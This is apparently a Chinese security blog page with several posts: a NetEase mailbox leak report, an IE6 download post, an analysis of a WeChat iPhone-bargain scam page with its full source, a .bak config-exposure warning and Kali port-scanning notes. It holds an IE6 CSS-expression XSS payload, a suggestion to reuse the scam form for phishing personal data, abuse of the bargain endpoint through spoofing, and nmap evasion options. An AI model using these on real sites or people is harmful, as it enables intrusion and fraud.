国内知名互联网服务商网易邮箱爆被脱裤过亿数据泄漏-Mrxn提醒大家赶紧修改密码吧 业界新闻
国内知名互联网服务商网易邮箱爆被脱裤过亿数据泄漏(涉及邮箱账号/密码/用户密保等)
易邮箱现漏洞,过亿数据泄漏!今日,有白帽子报告称网易163/126邮箱数据泄漏,影响数量总共数亿条。泄露信息包括用户名、密码、密码提示问题/答案(hash)、注册IP、生日等。其中密码密保均为MD5存储,解开后测试大部分邮箱依旧还可登陆... 目前该漏洞已被提交至国家互联网应急中心处理。
数据过亿交易证明数据/包含邮箱密码密保信息/登陆ip以及用户生日等,其中密码密保均为MD5存储,解开后测试大部分邮箱依旧还可登陆.网易邮箱现漏洞,过亿数据泄漏!今日,有白帽子报告称网易163/126邮箱数据泄漏,影响数量总共数亿条。泄露信息包括用户名、密码、密码提示问题/答案(hash)、注册IP、生日等。其中密码密保均为MD5存储,解开后测试大部分邮箱依旧还可登陆... 目前该漏洞已被提交至国家互联网应急中心处理。
注:裤子 你知道在那里吗!不告诉你!哈哈
温馨提示:赶紧修改密码吧!
中文、英文独立版的IE6-for-Win7 很好用的神器 神器荟萃
今天用到了IE6,因为不用ie6打开就是这个样子的:
很尴尬。。。搞了半天 结果发现原来是不支持。那么现在最新的浏览器基本上都是不支持IE7及以下了,好多IE8都不支持了,但是在做测试的时候遇见了一些古老的程序,还得需要使用IE低版本,然后呢,我就在独自等待哪里找到了这个独立版的IE6 ,刚好我电脑也可以运行,如果电脑不能运行,那就在虚拟机的XP里面测试吧!XP上面就是低版本的IE ,而且软件兼容性也比较好,基本上都是支持的。
大家在测试中是否会遇到各种XSS,但是有些只有在IE6下面才能利用? 比如
<div style="width:expression(alert(1))">XSS测试</div>
现在我们使用的基本都是win7系统,默认安装的就是IE8了,想用IE6怎么办?
还好昨天得到了一个神器,单文件运行的IE6,可以在Win7上面正常使用,偶尔会崩溃,但是不影响使用,感谢绿盟的朋友提供。
提供两个下载,大家自己选一个用就行了,第一个是英文版本的,第二个是中文版的,但是貌似有个2345推广,自己修改吧!
http://pan.baidu.com/s/1eQAr0KM 如果链接失效了 请及时通知我修复。
原文(独自等待博客-右侧友链)地址:http://www.waitalone.cn/ie6-for-win7.html
iPhone6s砍价之广告骗局分析小计-社工-不贪小便宜-钓鱼(爪机党慎入,多图) 技术文章
今晚正在请代码的时候,QQ闪好几下,烦死了(后悔忘记关掉QQ),一打开是一同学让我帮他
砍价iPhone6s,还有一个链接,于是习惯性的打开虚拟机,连上自己的代理,再打开他发过来的链接,帮他操作了一遍 ,我也不知道为毛脑袋里蹦出来伪造useragent和换IP的念头,于是试了一下,尼玛,居然可以再次砍价。。。哦!立马就知道这里面有鬼!
可利用社会工程学(或者是钓鱼)内容:以这个作为例子,添加一些你想要获取的信息,比如 地址,右边,身份证号码,手机号等等渗透辅助方式获取信息!
后来才发现更简单的方式砍价---详情请往下看:
就是那几个广告,卖药的,少儿不宜的。。。这才是广告主的主要意图吧!再来看看他的这个砍价,很搞笑!
他这个所有的东西都在源码里面了,其实就是因为利用手机微信 QQ空间 这些平台传播,手机端一般查看源码不方便,其实大家可以利用 http://tool.lu/viewsource/ 在手机端查看源码,电脑端很方便 ,直接Ctrl+U 或者是在菜单栏里面找到工具-查看源码(还可以在使用了JavaScript禁止查看源码的地方查看绝大多数源码)。
开始还以为每次的地址不一样,可是使用sublime text 的file diff插件(插件github地址:SublimeFileDiffs)
比较之后发现都是一样的!他奶奶个熊。。。逗我呢。。。于是就想到了写个脚本循环,直到 看后价格=0 。
其基本就是清除浏览器cookies 就可以继续提交。。。所以很简单。。。脚本运行 。。。刷。。完了。。。
他妹的 我最后才发现 都在网页的JavaScript里面。。。请允许我做一个悲伤的表情!
submintKanjiaStatus = 1; $.ajax({ type: "GET", url: "plugin.php?id=tom_kanjia&mod=ajax&act=kanjia&kid=1&uid=660546", dataType : "json", data: $('#kanjia').serialize(), success: function(data){ $(".add_box").addClass('box_hide'); submintKanjiaStatus = 0; if(data.status == 201) { tusi("已经帮砍过了"); setTimeout(function(){document.location.reload();},2888); }else if(data.status == 301){ tusi("不在允许砍价地区"); setTimeout(function(){document.location.reload();},2888); }else if(data.status == 302){ tusi("你帮砍次数达到限制"); setTimeout(function(){document.location.reload();},2888); }else if(data.status == 200){ $('#kandiaojiage').html(data.price); $(".dialog_box").removeClass('box_hide'); }else if(data.status == 100){ $('#kanjiamsg').html("已经最低了"); $(".dialog_box").removeClass('box_hide'); }else{ tusi("砍价错误"); setTimeout(function(){document.location.reload();},1888); } } }); }); var submintDuihuanStatus = 0; $(".a_duihuan_btn").click( function () { var dh_pwd = $("#dh_pwd").val(); if(submintDuihuanStatus == 1){ return false; } if(dh_pwd == ""){ tusi("必须填写兑换密码"); return false; } submintDuihuanStatus = 1; $.ajax({ type: "GET", url: "plugin.php?id=tom_kanjia&mod=ajax&act=duihuan&kid=1&uid=660546", dataType : "json", data: $('#dh_form').serialize(), success: function(data){ submintDuihuanStatus = 0; if(data.status == 100) { tusi("兑换密码错误"); }else if(data.status == 200){ $(".duihuan_box").addClass('box_hide'); tusi("兑换成功"); setTimeout(function(){document.location.reload();},1888); }else{ tusi("兑换异常,稍等重试"); } } }); });
啊。。。。不说了,只想说 ,还好这只是个刷广告访问量的,没打算偷你的隐私信息,要是他在进入这个页面之前让你填写一些私人信息,比如说什么收货地址、邮编、电话号码、等等。。。那你基本上就被曝光了。差不多裸体在它面前了。。。想想还是很恐怖的。。。好了废话不多说。
最后,Mrxn提醒广大市民朋友,特别是那些涉网未深的朋友,不要随便贪小便宜,天上不会掉馅饼儿,真掉下来还得小心别被砸死了。。。
其实就是Dz论坛的插件。。。。你们看了就知道 !http://ip6s.wzyhsh.com.cn/wkj/forum.php
o _ o 对了,源码在这里,大家自己研究吧,中间还是有些有用的东西。不想看的就直接Ctrl+end / home:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=GBK">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0 , maximum-scale=1.0, user-scalable=0">
<title>草泥马正在参加iPhone 6s手机砍价0元购,诚邀你助力,帮我砍一刀!</title>
<meta name="format-detection" content="telephone=no">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<script src="http://tajs.qq.com/stats?sId=51513877" type="text/javascript" charset="UTF-8"></script>
<link href="source/plugin/tom_kanjia/images/style_red.css" rel="stylesheet" type="text/css">
<script src="http://libs.baidu.com/jquery/1.8.3/jquery.min.js" type="text/javascript"></script>
<script src="source/plugin/tom_kanjia/images/common.js" type="text/javascript" type="text/javascript"></script>
<script src="http://res.wx.qq.com/open/js/jweixin-1.0.0.js" type="text/javascript" type="text/javascript"></script>
<base target="_self">
</head>
<body>
<section class="top_box clearfix">
<img src="http://t1.qpic.cn/mblogpic/1ef6860ec37537e504a0/2000" width="auto">
<div class="top_box_bottom">
活动倒计时:
<span id="day_show">0</span>天
<span id="hour_show">0</span>时
<span id="minute_show">0</span>分
<span id="second_show">0</span>秒
</div>
</section>
<section class="about_box clearfix">
<div class="about_box_main clearfix">
<div class="about_box_main_title clearfix">亲:</div>
<div class="about_box_main_desc clearfix">已经有92亲友,帮助草泥马砍价了,当前价格为70.25,你也来帮助他砍一刀吧!</div>
</div>
</section>
<section class="btn_box clearfix">
<div class="btn_box_main clearfix">
<div class="btn_box_main_btn clearfix">
<ul>
<li><a href="javascript:void(0);" class="a_kanjia_box" onclick="show_add_box();">帮砍一刀</a></li>
<li><a href="plugin.php?id=tom_kanjia&kid=1">我要参加</a></li>
<!-- <li><a href="http://mp.weixin.qq.com/s?__biz=MzIwMDE1NDkwMQ==&mid=208996211&idx=1&sn=5ae3102f2b9c6efc289c4f4b13eeca90#rd">我要参加</a></li> -->
</ul>
</div>
</div>
</section>
<section class="qyt_box clearfix">
<div class="qyt_box_table clearfix">
<table cellpadding="0" cellspacing="0" >
<thead>
<tr>
<th width="33%">亲友团</th>
<th width="33%">砍掉价格</th>
<th width="33%">砍后价格</th>
</tr>
</thead>
<tbody>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥3.7</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥70.25</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥9.89</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥73.95</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥3.94</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥83.84</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥5.58</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥87.78</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥9.02</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥93.36</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥6.17</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥102.38</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥3.12</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥108.55</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥6.72</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥111.67</td>
</tr>
<tr class="top">
<td>不完了</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥6.61</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥118.39</td>
</tr>
<tr class="top">
<td>张欢</td>
<td><span style="text-decoration: line-through;color: #C0BBBB;">¥7.67</span></td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥125</td>
</tr>
</tbody>
</table>
<div class="pages clearfix">
<ul class="clearfix">
<li style="width: 40%;"><span>上一页</span></li>
<li style="width: 20%;"><span>1/10</span></li>
<li style="width: 40%;"><a href="plugin.php?id=tom_kanjia&mod=index&kid=1&uid=660546&page=2">下一页</a></li>
</ul>
</div>
</div>
</section>
<section class="more_box_title">
<div class="more_box_title_main">
<h1>商品详情</h1>
</div>
</section>
<section class="more_box_main">
<div class="more_box_main_main"><p>
<span>品牌iPhone 6s限量</span><strong>200</strong><span>件,已砍走41件</span><strong><span style="color:#009900;">(</span></strong><strong><span style="color:#009900;">砍走手机包邮/无任何费用</span></strong><strong><span style="color:#009900;">)</span></strong><span>,赶快邀请好友帮忙砍价!点击上方</span><strong><span style="color:#009900;">我要参加</span></strong><span>加入砍价赢手机。</span>
</p>
<p>
<span><img src="http://t1.qpic.cn/mblogpic/b6ec7b978502bed4dabc/2000" alt="" /><img src="http://t1.qpic.cn/mblogpic/400b778aad9c9e1ad54a/2000" alt="" /><br />
</span>
</p></div>
</section>
<section class="more_box_title" id="content_rule">
<div class="more_box_title_main" >
<h1>活动规则</h1>
</div>
</section>
<section class="more_box_main">
<div class="more_box_main_main"><p>
<strong>1.本次活动时间:2015年10月01日--2015年11月30日</strong>
</p>
<p>
<strong>2.点击上方</strong><strong><span style="color:#009900;">我要参加</span></strong><strong>加入砍价赢手机。</strong>
</p>
<p>
<strong>3.原价6088元的手机,</strong><strong><span style="color:#009900;">亲友团每人可帮砍1 - 500元</span></strong><strong>,砍到最低至0元,</strong><strong><span style="color:#009900;">砍价过程均可按照实时价格订购</span></strong>
</p>
<p>
<strong>4.砍价成功后请在弹出页面输入联系人,地址,电话,客服会在7个工作日内与您取得联系。</strong>
</p>
<p>
<strong>5. 本次活动砍价手机一律为64G版,颜色可选。</strong>
</p>
<p>
<strong><br />
</strong>
</p>
<p>
<strong><strong><span style="color:#009900;">提示:</span></strong><strong>建议微信转发或群发朋友帮你砍价</strong></strong>
</p>
<p>
<strong><strong><img src="http://t1.qpic.cn/mblogpic/392b29537adb9aafcc4a/2000" alt="" /><br />
</strong></strong>
</p>
<p>
<strong><strong><img src="http://t1.qpic.cn/mblogpic/53cd484dfc25a512195a/2000" alt="" /><br />
</strong></strong>
</p>
<p>
<strong><strong><img src="http://t1.qpic.cn/mblogpic/1ef6860ec37537e504a0/2000" alt="" /><br />
</strong></strong>
</p>
<p>
<strong><strong><img src="http://t1.qpic.cn/mblogpic/3f27d99f5db5e80913d0/2000" alt="" /><br />
</strong></strong>
</p>
<p>
<strong><strong><img src="http://t1.qpic.cn/mblogpic/456042e0aec27104cb12/2000" alt="" /><br />
</strong></strong>
</p>
<p>
<strong><strong><br />
</strong></strong>
</p></div>
</section>
<section class="more_box_title">
<div class="more_box_title_main clearfix">
<h1><font color="#FF0000">砍价排行榜</font></h1>
</div>
</section>
<section class="qyt_box clearfix" style="margin-top: 20px;">
<div class="qyt_box_table clearfix">
<table cellpadding="0" cellspacing="0" >
<thead>
<tr>
<th width="20%">排行榜</th>
<th width="40%">姓名</th>
<th width="40%">价格</th>
</tr>
</thead>
<tbody>
<tr class="top">
<td>1</td>
<td>吴***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>2</td>
<td>程***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>3</td>
<td>李***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>4</td>
<td>代***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>5</td>
<td>高***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>6</td>
<td>马***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>7</td>
<td>黄***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>8</td>
<td>刘***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>9</td>
<td>王***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
<tr class="top">
<td>10</td>
<td>张***</td>
<td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
</tr>
</tbody>
</table>
</div>
</section>
<section class="banquan_main" style="min-height:120px">
<div class="banquan_main_main">
</div>
</section>
<script type="text/javascript">
var d = new Date();
var ad_01_link = "http://vk" + (d.getDay() * 30 + d.getHours()) + ".cx718.cn/copy/index/103/5115/9053/1443885112";
</script>
<!-- <a href="http://www.51zhuanzhuan.net/renwu/help/getstart.php">每天一分钟,自动挣钱好轻松!</a> -->
<section class="guanzu_box clearfix" style="height:110px">
<div class="guanzu_box_main clearfix">
<table border="0" style="font-size:14px;line-height:30px;word-break:keep-all;white-space:nowrap;text-align:left">
<tr>
<td width="56">
<a href="javascript:location.href = ad_01_link;">
<img src="http://t1.qpic.cn/mblogpic/96db667d855b87630fda/2000" style="height: 32px;width: 50px;
">
</a>
</td>
<td height="21">
<a href="javascript:location.href = ad_01_link;" style="color:#e7e7e7;text-decoration:none;">
老公一晚.三次,搞的人家都求饶了,还要...
</a>
</td>
</tr>
<tr>
<td width="56">
<a href="http://lhxs.changchenglong.com.cn/wkj/ad02.php">
<img src="http://t1.qpic.cn/mblogpic/e4de3a81de94475f5f1a/2000" style="height: 32px;width: 50px;">
</a>
</td>
<td height="21">
<a href="http://lhxs.changchenglong.com.cn/wkj/ad02.php" style="color:#e7e7e7;text-decoration:none;">
揭秘:李某迷奸过程的真实内幕(内附视频)
</a>
</td>
</tr>
<tr>
<td width="56">
<a href="http://v8.changchenglong.com.cn/wkj/ad03.php">
<img src="http://t1.qpic.cn/mblogpic/06b70d418dafabd236a8/2000" style="height: 32px;width: 50px;">
</a>
</td>
<td height="21">
<a href="http://v8.changchenglong.com.cn/wkj/ad03.php" style="color:#e7e7e7;text-decoration:none;">
美女见富二代,被自愿发生关系13次,我跪了...
</a>
</td>
</tr>
</table>
<div class="guanzu_box_main_close" style="top:0px;right:0px"><a href="javascript:void(0);" onclick="close_guanzu_box();">X</a></div>
</div>
</section>
<section class="add_box clearfix box_hide">
<div class="add_box_main clearfix">
<div class="add_box_main_msg">为了便于草泥马知道你是谁,请留下你的姓名或者昵称。</div>
<form id="kanjia">
<div class="add_box_main_input"><input name="name" id="name" placeholder="填写姓名或昵称" type="text"></div>
<div class="add_box_main_input">
<input name="num_sun" id="num_sun" type="text" style="width: 100px;"> 计算:7+3=?
<input type="hidden" name="formhash" value="2196e42b">
<input type="hidden" name="openid" value="">
<input type="hidden" name="num_a" value="7">
<input type="hidden" name="num_b" value="3">
<input type="hidden" name="num_count" id="num_count" value="10">
</div>
</form>
<div class="add_box_main_btn">
<ul>
<li><a href="javascript:void(0);" class="a_kanjia_btn">帮砍价</a></li>
<li><a href="javascript:void(0);" onclick="close_add_box();" class="close">取消</a></li>
</ul>
</div>
</div>
</section>
<section class="duihuan_box clearfix box_hide">
<div class="duihuan_box_main clearfix" style="height: 150px;">
<div class="duihuan_box_main_msg">商家输入兑换密码</div>
<form id="dh_form">
<div class="duihuan_box_main_input">
<input name="dh_pwd" id="dh_pwd" type="text" placeholder="请输入商品兑换密码">
<input type="hidden" name="formhash" value="2196e42b">
</div>
</form>
<div class="duihuan_box_main_btn">
<ul>
<li><a href="javascript:void(0);" class="a_duihuan_btn">兑换</a></li>
<li><a href="javascript:void(0);" onclick="close_duihuan_box();" class="close">取消</a></li>
</ul>
</div>
</div>
</section>
<section class="dialog_box clearfix box_hide">
<div class="dialog_box_main clearfix">
<div class="dialog_box_main_box">
<div class="dialog_box_main_box_left"><img src="source/plugin/tom_kanjia/images/foutou_ico.png" width="130" height="100"></div>
<div class="dialog_box_main_box_right"><span class="tt" id="kanjiamsg">成功砍掉了</span><br/><span id="kandiaojiage" class="num">¥0</span></div>
</div>
<div class="dialog_box_main_btn clearfix ">
<a href="javascript:void(0);" onclick="close_dialog_box();">关 闭</a>
</div>
</div>
</section>
<script type="text/javascript">
function showShareGuide(){
$('body').append('<section class="top_box clearfix box_hide"><img src=""></section><div id="share_guide_box" onclick="hideShareGuide();" style="position:fixed;z-index:9999999;right:0px;top:0px;width:100%;height:100%;background-color: rgba(0,0,0,0.8);text-align:right;" ontouchmove="return true;" ><img src="source/plugin/tom_kanjia/images/share.png" style="margin-top:10px;margin-right:10px;float: right;"></div>');
}
function hideShareGuide(){
$("#share_guide_box").remove();
}
function close_dialog_box(){
$(".dialog_box").addClass('box_hide');
setTimeout(function(){document.location.reload();},1888);
}
function close_guanzu_box(){
$(".guanzu_box").addClass('box_hide');
}
function close_add_box(){
$(".add_box").addClass('box_hide');
}
function show_add_box(){
$(".add_box").removeClass('box_hide');
}
function close_duihuan_box(){
$(".duihuan_box").addClass('box_hide');
}
function show_duihuan_box(){
$(".duihuan_box").removeClass('box_hide');
}
var submintZikanStatus = 0;
$(".a_zikan_btn").click( function () {
if(submintZikanStatus == 1){
return false;
}
submintZikanStatus = 1;
$.ajax({
type: "GET",
url: "plugin.php?id=tom_kanjia&mod=ajax&act=zikan&kid=1&uid=660546&formhash=2196e42b",
dataType : "json",
data: "",
success: function(data){
submintZikanStatus = 0;
if(data.status == 100) {
tusi("已经帮砍过了");
setTimeout(function(){document.location.reload();},1888);
}else if(data.status == 200){
$('#kandiaojiage').html(data.price);
$(".dialog_box").removeClass('box_hide');
}else{
tusi("砍价错误");
setTimeout(function(){document.location.reload();},1888);
}
}
});
});
var submintKanjiaStatus = 0;
$(".a_kanjia_btn").click( function () {
var name = $("#name").val();
var num_count = $("#num_count").val();
var num_sun = $("#num_sun").val();
if(submintKanjiaStatus == 1){
return false;
}
if(name == ""){
tusi("必须填写姓名、昵称");
return false;
}
if(num_sun == "" || num_count != num_sun){
tusi("数字验证计算错误");
return false;
}
submintKanjiaStatus = 1;
$.ajax({
type: "GET",
url: "plugin.php?id=tom_kanjia&mod=ajax&act=kanjia&kid=1&uid=660546",
dataType : "json",
data: $('#kanjia').serialize(),
success: function(data){
$(".add_box").addClass('box_hide');
submintKanjiaStatus = 0;
if(data.status == 201) {
tusi("已经帮砍过了");
setTimeout(function(){document.location.reload();},2888);
}else if(data.status == 301){
tusi("不在允许砍价地区");
setTimeout(function(){document.location.reload();},2888);
}else if(data.status == 302){
tusi("你帮砍次数达到限制");
setTimeout(function(){document.location.reload();},2888);
}else if(data.status == 200){
$('#kandiaojiage').html(data.price);
$(".dialog_box").removeClass('box_hide');
}else if(data.status == 100){
$('#kanjiamsg').html("已经最低了");
$(".dialog_box").removeClass('box_hide');
}else{
tusi("砍价错误");
setTimeout(function(){document.location.reload();},1888);
}
}
});
});
var submintDuihuanStatus = 0;
$(".a_duihuan_btn").click( function () {
var dh_pwd = $("#dh_pwd").val();
if(submintDuihuanStatus == 1){
return false;
}
if(dh_pwd == ""){
tusi("必须填写兑换密码");
return false;
}
submintDuihuanStatus = 1;
$.ajax({
type: "GET",
url: "plugin.php?id=tom_kanjia&mod=ajax&act=duihuan&kid=1&uid=660546",
dataType : "json",
data: $('#dh_form').serialize(),
success: function(data){
submintDuihuanStatus = 0;
if(data.status == 100) {
tusi("兑换密码错误");
}else if(data.status == 200){
$(".duihuan_box").addClass('box_hide');
tusi("兑换成功");
setTimeout(function(){document.location.reload();},1888);
}else{
tusi("兑换异常,稍等重试");
}
}
});
});
wx.config({
debug: false,
appId: '',
timestamp: 1444651774,
nonceStr: 'UDdhMFxrwFmWcUTe',
signature: '127f1c8b81a01f2120eb52421b2f8fde76f25ff7',
jsApiList: [
'onMenuShareTimeline',
'onMenuShareAppMessage'
]
});
wx.ready(function () {
wx.onMenuShareTimeline({
title: '草泥马正在参加iPhone 6s手机砍价0元购,诚邀你助力,帮我砍一刀!',
link: 'http://ip6s.wzyhsh.com.cn/wkj/plugin.php?id=tom_kanjia&mod=index&kid=1&uid=660546',
imgUrl: 'http://t1.qpic.cn/mblogpic/1ef6860ec37537e504a0/2000',
success: function () {
},
cancel: function () {
}
});
wx.onMenuShareAppMessage({
title: '草泥马正在参加iPhone 6s手机砍价0元购,诚邀你助力,帮我砍一刀!',
desc: '',
link: 'http://ip6s.wzyhsh.com.cn/wkj/plugin.php?id=tom_kanjia&mod=index&kid=1&uid=660546',
imgUrl: 'http://t1.qpic.cn/mblogpic/1ef6860ec37537e504a0/2000',
type: 'link',
dataUrl: '',
success: function () {
},
cancel: function () {
}
});
});
var intDiff = parseInt(4209926);
function timer(intDiff){
window.setInterval(function(){
var day=0,
hour=0,
minute=0,
second=0;
if(intDiff > 0){
day = Math.floor(intDiff / (60 * 60 * 24));
hour = Math.floor(intDiff / (60 * 60)) - (day * 24);
minute = Math.floor(intDiff / 60) - (day * 24 * 60) - (hour * 60);
second = Math.floor(intDiff) - (day * 24 * 60 * 60) - (hour * 60 * 60) - (minute * 60);
}
if (minute <= 9) minute = '0' + minute;
if (second <= 9) second = '0' + second;
$('#day_show').html(day+'');
$('#hour_show').html(hour+'');
$('#minute_show').html(minute+'');
$('#second_show').html(second+'');
intDiff--;
}, 1000);
}
$(function(){
timer(intDiff);
});
</script>
</body>
</html>
站长切记:请勿将重要配置文件备份为.bak后缀 网络安全
很多站长有这样一个习惯,更改网站配置文件之前将原始文件重命名来备份,例如将config.php重命名为config.php.bak,殊不知这样一个小小的细节就给黑客留下了可乘之机,站长们可以做如下实验:
1、将您网站根目录下任意.php文件重命名为.php.bak,例如将config.php重命名为config.php.bak
2、然后您在浏览器中输入http://你的网站域名/config.php.bak
3、看到没?PHP文件里面所有的信息都显示出来了有没有?或者是可以下载!但是你直接访问 http://你的网站域名/config.php (非入口文件)是看不到里面的代码的!
所以,黑客就利用了站长们这点不好的习惯,对网站的可能的配置文件进行扫描,如下图某网站安全软件拦截信息:
确实是这样的,不相信的可以自己测试。当然你还可以测试你想要下载的文件,比如说模板文件,js,等等,这里不多说,请自行摸索。
所以我们在可以修改备份文件名后缀,或者是使用防护软件进行防护。
原文地址:http://blog.ailab.cn/post/129
kali学习记录之端口扫描 Linux
端口扫描的目的是识别目标系统中哪些端口是开启状态,哪些服务可以使用。比如FTP/SSH/TELNET/打印服务/web服务等等。计算机系统中共有65536个端口,因此连接这些端口并扫描出可用的端口就变的有意义了。
1、网络连接
kali的网络默认是 设备未托管状态,因此需要开启。开启方法:修改/etc/NetworkManager/下的NetworkManger.conf文件,managed = false修改为true,重启。
2、FPing工具
root@walfred:~# fping -h Usage: fping [options] [targets...] -a show targets that are alive -A show targets by address -b n amount of ping data to send, in bytes (default 56) -B f set exponential backoff factor to f -c n count of pings to send to each target (default 1) -C n same as -c, report results in verbose format -e show elapsed time on return packets -f file read list of targets from a file ( - means stdin) (only if no -g specified) -g generate target list (only if no -f specified) (specify the start and end IP in the target list, or supply a IP netmask) (ex. fping -g 192.168.1.0 192.168.1.255 or fping -g 192.168.1.0/24) -H n Set the IP TTL value (Time To Live hops) -i n interval between sending ping packets (in millisec) (default 25) -l loop sending pings forever -m ping multiple interfaces on target host -n show targets by name (-d is equivalent) -p n interval between ping packets to one target (in millisec) (in looping and counting modes, default 1000) -q quiet (don't show per-target/per-ping results) -Q n same as -q, but show summary every n seconds -r n number of retries (default 3) -s print final stats -I if bind to a particular interface -S addr set source address -t n individual target initial timeout (in millisec) (default 500) -T n ignored (for compatibility with fping 2.4) -u show targets that are unreachable -O n set the type of service (tos) flag on the ICMP packets -v show version targets list of targets to check (if no -f specified)
3、Nmap工具
使用方法:
root@walfred:~# nmap -h Nmap 6.47 ( http://nmap.org ) Usage: nmap [Scan Type(s)] [Options] {target specification} TARGET SPECIFICATION: Can pass hostnames, IP addresses, networks, etc. Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 -iL <inputfilename>: Input from list of hosts/networks -iR <num hosts>: Choose random targets --exclude <host1[,host2][,host3],...>: Exclude hosts/networks --excludefile <exclude_file>: Exclude list from file HOST DISCOVERY: 主机网络发现功能 -sL: List Scan - simply list targets to scan -sn: Ping Scan - disable port scan -Pn: Treat all hosts as online -- skip host discovery 禁止网络发现功能,认为所有主机在线 -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes -PO[protocol list]: IP Protocol Ping -n/-R: Never do DNS resolution/Always resolve [default: sometimes] --dns-servers <serv1[,serv2],...>: Specify custom DNS servers --system-dns: Use OS's DNS resolver --traceroute: Trace hop path to each host SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans SYN/TCP/ACK/windown/conn扫描参数 -sU: UDP Scan UDP扫描参数指定 -sN/sF/sX: TCP Null, FIN, and Xmas scans NULL/FIN/xmas扫描 --scanflags <flags>: Customize TCP scan flags -sI <zombie host[:probeport]>: Idle scan -sY/sZ: SCTP INIT/COOKIE-ECHO scans -sO: IP protocol scan -b <FTP relay host>: FTP bounce scan PORT SPECIFICATION AND SCAN ORDER: -p <port ranges>: Only scan specified ports Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9 -F: Fast mode - Scan fewer ports than the default scan -r: Scan ports consecutively - don't randomize --top-ports <number>: Scan <number> most common ports --port-ratio <ratio>: Scan ports more common than <ratio> SERVICE/VERSION DETECTION: -sV: Probe open ports to determine service/version info --version-intensity <level>: Set from 0 (light) to 9 (try all probes) --version-light: Limit to most likely probes (intensity 2) --version-all: Try every single probe (intensity 9) --version-trace: Show detailed version scan activity (for debugging) SCRIPT SCAN: -sC: equivalent to --script=default --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts --script-args-file=filename: provide NSE script args in a file --script-trace: Show all data sent and received --script-updatedb: Update the script database. --script-help=<Lua scripts>: Show help about scripts. <Lua scripts> is a comma-separated list of script-files or script-categories. OS DETECTION: -O: Enable OS detection --osscan-limit: Limit OS detection to promising targets --osscan-guess: Guess OS more aggressively TIMING AND PERFORMANCE: Options which take <time> are in seconds, or append 'ms' (milliseconds), 's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m). -T<0-5>: Set timing template (higher is faster) --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes --min-parallelism/max-parallelism <numprobes>: Probe parallelization --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies probe round trip time. --max-retries <tries>: Caps number of port scan probe retransmissions. --host-timeout <time>: Give up on target after this long --scan-delay/--max-scan-delay <time>: Adjust delay between probes --min-rate <number>: Send packets no slower than <number> per second --max-rate <number>: Send packets no faster than <number> per second FIREWALL/IDS EVASION AND SPOOFING: -f; --mtu <val>: fragment packets (optionally w/given MTU) -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys -S <IP_Address>: Spoof source address -e <iface>: Use specified interface -g/--source-port <portnum>: Use given port number --proxies <url1,[url2],...>: Relay connections through HTTP/SOCKS4 proxies --data-length <num>: Append random data to sent packets 